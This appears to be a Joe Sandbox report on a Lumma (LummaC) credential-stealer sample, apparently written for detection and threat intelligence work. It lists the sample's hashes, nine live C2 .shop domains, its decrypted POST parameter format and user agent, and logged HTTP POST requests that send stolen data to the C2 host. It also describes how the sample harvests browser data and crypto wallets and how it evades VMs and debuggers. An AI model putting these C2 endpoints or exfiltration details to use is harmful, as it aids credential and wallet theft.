Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1431744
MD5:93115e1730da5003243c419c7d841ca3
SHA1:f78e99d234fada2af2a61ed5b3095aeb1be16247
SHA256:6501a306d8930d9e9504ab23bc393eaef11b2a9ec1098037d07842431ec35c92
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 93115E1730DA5003243C419C7D841CA3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "shortsvelventysjo.shop"], "Build id": "ErN1Nu--crypto"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: file.exe PID: 6608JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: file.exe PID: 6608JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 6608JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:04/25/24-17:38:58.817833
              SID:2052226
              Source Port:49707
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-17:38:59.604921
              SID:2052226
              Source Port:49708
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-17:39:03.546775
              SID:2052226
              Source Port:49712
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-17:39:00.544364
              SID:2052226
              Source Port:49709
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-17:39:05.734459
              SID:2052226
              Source Port:49714
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-17:39:01.465789
              SID:2052226
              Source Port:49710
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-17:39:04.372064
              SID:2052226
              Source Port:49713
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-17:39:02.392596
              SID:2052226
              Source Port:49711
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-17:38:58.683515
              SID:2052214
              Source Port:53751
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://shortsvelventysjo.shop/apiAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 0.2.file.exe.af0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "shortsvelventysjo.shop"], "Build id": "ErN1Nu--crypto"}
              Multi AV Scanner detection for domain / URL
              Source: shortsvelventysjo.shopVirustotal: Detection: 16%Perma Link
              Source: shortsvelventysjo.shopVirustotal: Detection: 16%Perma Link
              Source: https://shortsvelventysjo.shop/hVirustotal: Detection: 8%Perma Link
              Source: tolerateilusidjukl.shopVirustotal: Detection: 14%Perma Link
              Source: demonstationfukewko.shopVirustotal: Detection: 18%Perma Link
              Source: shatterbreathepsw.shopVirustotal: Detection: 17%Perma Link
              Source: productivelookewr.shopVirustotal: Detection: 16%Perma Link
              Source: https://shortsvelventysjo.shop/apiVirustotal: Detection: 17%Perma Link
              Source: https://shortsvelventysjo.shop/apiSVirustotal: Detection: 10%Perma Link
              Source: alcojoldwograpciw.shopVirustotal: Detection: 17%Perma Link
              Source: incredibleextedwj.shopVirustotal: Detection: 14%Perma Link
              Source: liabilitynighstjsko.shopVirustotal: Detection: 17%Perma Link
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: demonstationfukewko.shop
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: liabilitynighstjsko.shop
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: alcojoldwograpciw.shop
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: incredibleextedwj.shop
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: shortsvelventysjo.shop
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: shatterbreathepsw.shop
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: tolerateilusidjukl.shop
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: productivelookewr.shop
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: shortsvelventysjo.shop
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString decryptor: ErN1Nu--crypto
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B06645 CryptUnprotectData,0_2_00B06645
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.16.225:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00B0601F
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], FD72A8C7h0_2_00B262F2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 73CEF4DDh0_2_00B263FF
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edi], ax0_2_00B10D80
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [00B31300h]0_2_00B10D80
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then lea eax, dword ptr [esi+70h]0_2_00B10D80
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]0_2_00B06EA6
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00B05340
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00B05470
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]0_2_00AF9970
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00B21DE0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp cl, 0000002Eh0_2_00B12090
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then test esi, esi0_2_00B281B9
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edi], cx0_2_00B261F7
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edi], ax0_2_00B2617A
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_00AF25A0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00B0A5E0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00B0A5E0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_00B066E7
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00B167BA
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00B0C798
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00B167C9
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00B1672D
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h0_2_00B0AAB0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00B14AB3
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_00B06A89
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_00B06A89
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edi], ax0_2_00B10DF0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then inc ebx0_2_00B04EC0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+00000540h]0_2_00B15082
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+00000540h]0_2_00B14FB4
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_00AFD2A0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+00000540h]0_2_00B14AAE
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ecx+eax+01h], 00000000h0_2_00B01361
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h0_2_00B01361
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00B27499
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ecx0_2_00B134EC
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]0_2_00AF94F0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [00B31B48h]0_2_00B13444
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00B1FCC0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 0AB35B01h0_2_00B03DC7
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00B15EDD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00B15EDD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, word ptr [edi+ecx*4]0_2_00AF7E40
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax*4]0_2_00AF7E40
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00AFFFA2

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2052214 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (shortsvelventysjo .shop) 192.168.2.5:53751 -> 1.1.1.1:53
              Source: TrafficSnort IDS: 2052226 ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI) 192.168.2.5:49707 -> 104.21.16.225:443
              Source: TrafficSnort IDS: 2052226 ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI) 192.168.2.5:49708 -> 104.21.16.225:443
              Source: TrafficSnort IDS: 2052226 ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI) 192.168.2.5:49709 -> 104.21.16.225:443
              Source: TrafficSnort IDS: 2052226 ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI) 192.168.2.5:49710 -> 104.21.16.225:443
              Source: TrafficSnort IDS: 2052226 ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI) 192.168.2.5:49711 -> 104.21.16.225:443
              Source: TrafficSnort IDS: 2052226 ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI) 192.168.2.5:49712 -> 104.21.16.225:443
              Source: TrafficSnort IDS: 2052226 ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI) 192.168.2.5:49713 -> 104.21.16.225:443
              Source: TrafficSnort IDS: 2052226 ET TROJAN Observed Lumma Stealer Related Domain (shortsvelventysjo .shop in TLS SNI) 192.168.2.5:49714 -> 104.21.16.225:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: demonstationfukewko.shop
              Source: Malware configuration extractorURLs: liabilitynighstjsko.shop
              Source: Malware configuration extractorURLs: alcojoldwograpciw.shop
              Source: Malware configuration extractorURLs: incredibleextedwj.shop
              Source: Malware configuration extractorURLs: shortsvelventysjo.shop
              Source: Malware configuration extractorURLs: shatterbreathepsw.shop
              Source: Malware configuration extractorURLs: tolerateilusidjukl.shop
              Source: Malware configuration extractorURLs: productivelookewr.shop
              Source: Malware configuration extractorURLs: shortsvelventysjo.shop
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: shortsvelventysjo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 55Host: shortsvelventysjo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12836Host: shortsvelventysjo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15078Host: shortsvelventysjo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20568Host: shortsvelventysjo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7089Host: shortsvelventysjo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1367Host: shortsvelventysjo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 598368Host: shortsvelventysjo.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: shortsvelventysjo.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: shortsvelventysjo.shop
              Source: file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2046041010.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.2055379843.0000000001A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: file.exe, 00000000.00000003.2058469300.0000000001A1A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2055535840.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2057887848.0000000001A1A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058091669.0000000001A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.2055379843.0000000001A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.2055379843.0000000001A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000003.2055379843.0000000001A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: file.exe, 00000000.00000003.2027137323.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106837095.0000000001996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/
              Source: file.exe, 00000000.00000003.2074929034.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/#
              Source: file.exe, 00000000.00000003.2027075463.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2027137323.00000000019CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/)DC
              Source: file.exe, 00000000.00000003.2074929034.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/8
              Source: file.exe, 00000000.00000003.2036534716.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/9
              Source: file.exe, 00000000.00000003.2036534716.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/E
              Source: file.exe, 00000000.00000003.2027075463.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2027137323.00000000019CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/PDJ
              Source: file.exe, 00000000.00000003.2027075463.00000000019BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2108019419.00000000019AD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2036534716.0000000001A0A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106566914.0000000001A0A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2036534716.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2027137323.00000000019CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/api
              Source: file.exe, 00000000.00000003.2074929034.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/api8
              Source: file.exe, 00000000.00000003.2074929034.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/api=
              Source: file.exe, 00000000.00000003.2074929034.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/apiS
              Source: file.exe, 00000000.00000003.2106837095.000000000198F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/apiakijgnj
              Source: file.exe, 00000000.00000003.2036534716.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/apinn
              Source: file.exe, 00000000.00000002.2108071195.0000000001A0D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106566914.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shortsvelventysjo.shop/h
              Source: file.exe, 00000000.00000003.2046828784.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2046828784.0000000003FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.2058469300.0000000001A1A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2055535840.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2057887848.0000000001A1A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058091669.0000000001A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: file.exe, 00000000.00000003.2055379843.0000000001A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: file.exe, 00000000.00000003.2028182477.0000000003ED6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
